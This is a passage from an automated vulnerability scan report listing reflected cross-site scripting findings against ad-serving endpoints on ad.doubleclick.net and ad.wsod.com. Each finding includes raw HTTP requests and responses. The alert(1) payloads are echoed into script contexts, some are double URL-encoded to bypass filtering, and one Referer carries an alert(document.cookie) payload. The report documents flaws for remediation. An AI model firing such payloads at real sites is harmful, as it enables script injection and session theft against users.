5.51. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [TargetID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36039'-alert(1)-'7c5b64ad2e1 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=2825348936039'-alert(1)-'7c5b64ad2e1&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=2825348936039'-alert(1)-'7c5b64ad2e1&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://w
...[SNIP]...

5.52. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [UIT parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e1c6'-alert(1)-'e0a8cb864a0 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G9e1c6'-alert(1)-'e0a8cb864a0&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:49:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G9e1c6'-alert(1)-'e0a8cb864a0&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;
...[SNIP]...

5.53. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [destination parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2757'-alert(1)-'bc021de3ac was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=d2757'-alert(1)-'bc021de3ac HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 596
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 30 Jan 2011 14:50:37 GMT
Expires: Sun, 30 Jan 2011 14:50:37 GMT

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=d2757'-alert(1)-'bc021de3achttp://ad.doubleclick.net/click;h=v8/3a9f/14/da/%2a/l;233815726;0-0;0;57696442;91-300/60;39157699/39175486/1;;~sscs=%3fhttp://www.progressive.com/insurance/nyp/display.aspx?&code=9903600230&utm_medium=
...[SNIP]...

5.54. http://ad.doubleclick.net/adj/N4492.MSN/B5014254.31 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N4492.MSN/B5014254.31

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72964'-alert(1)-'300a0130d45 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N4492.MSN/B5014254.31;sz=300x60;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!72964'-alert(1)-'300a0130d45&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=;ord=423168972? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 30 Jan 2011 14:48:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 597

document.write('<a target="_blank" href="http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/28000000000031590.1?!72964'-alert(1)-'300a0130d45&&PID=8005875&UIT=G&TargetID=28253489&AN=423168972&PG=INVPC4&ASID=f5d9a8756fc943da8c2ca677811c16ab&destination=http://ad.doubleclick.net/click;h=v8/3a9f/14/db/%2a/l;233815726;0-0;0;57696442;91-300/60;3
...[SNIP]...

5.55. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 482d2%2522%253balert%25281%2529%252f%252f363cbcfa118 was submitted in the REST URL parameter 2. This input was echoed as 482d2";alert(1)//363cbcfa118 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260482d2%2522%253balert%25281%2529%252f%252f363cbcfa118/45.0.js.300x250/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260482d2";alert(1)//363cbcfa118/45.0.js.300x250/1296353117**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.56. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 117bb%2522%253balert%25281%2529%252f%252f9c0f430c402 was submitted in the REST URL parameter 3. This input was echoed as 117bb";alert(1)//9c0f430c402 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250117bb%2522%253balert%25281%2529%252f%252f9c0f430c402/1296350884** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1593

   function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.ShockwaveFlash.6');
           try { axo.AllowScriptAccess = 'always';    }
           catch(e) {return '6,0,0';}
       } catch(e) {}
       try {
           retu
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250117bb";alert(1)//9c0f430c402/1296353119**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.57. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7d1e%2522%253balert%25281%2529%252f%252f09059928b was submitted in the REST URL parameter 2. This input was echoed as b7d1e";alert(1)//09059928b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260b7d1e%2522%253balert%25281%2529%252f%252f09059928b/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1525

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260b7d1e";alert(1)//09059928b/45.0.js.300x250/1296351640**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.58. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf329%2522%253balert%25281%2529%252f%252f8550b302086 was submitted in the REST URL parameter 3. This input was echoed as bf329";alert(1)//8550b302086 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250bf329%2522%253balert%25281%2529%252f%252f8550b302086/Insert_Random_Number?click=Insert_Click_Track_URL HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1527

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250bf329";alert(1)//8550b302086/1296351650**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

5.59. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 677e0"-alert(1)-"d0d500f82e2 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL677e0"-alert(1)-"d0d500f82e2 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:39:48 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1556

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
ype="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296351588**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=Insert_Click_Track_URL677e0"-alert(1)-"d0d500f82e2">
...[SNIP]...

5.60. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14771"-alert(1)-"6bc375b9650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/Insert_Random_Number?click=Insert_Click_Track_URL&14771"-alert(1)-"6bc375b9650=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 01:40:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1559

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
pe="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296351623**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=Insert_Click_Track_URL&14771"-alert(1)-"6bc375b9650=1">
...[SNIP]...

5.61. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [&PID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8c8"-alert(1)-"ef2d57917af was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235ce8c8"-alert(1)-"ef2d57917af&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:49:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
to+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296398960**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235ce8c8"-alert(1)-"ef2d57917af&UIT=G&TargetID=8231208&AN=1110508137&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a">
...[SNIP]...

5.62. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137 [AN parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88ae9"-alert(1)-"90a9ad5ee9c was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1110508137?click=http://g.redacted/_2AD0003L/97000000000044962.1?!&&PID=8015235&UIT=G&TargetID=8231208&AN=111050813788ae9"-alert(1)-"90a9ad5ee9c&PG=INV4QD&ASID=de8164d050b942d8a816e5fd11a9275a HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; u=4d2cdd9abba1d; fp=599362::7:IN:::1296392421:1:33; i_1=33:1391:835:95:0:34115:1296392421:B2|33:353:516:3:0:34115:1296392207:B2|33:1391:835:95:0:34115:1296392206:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 14:50:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
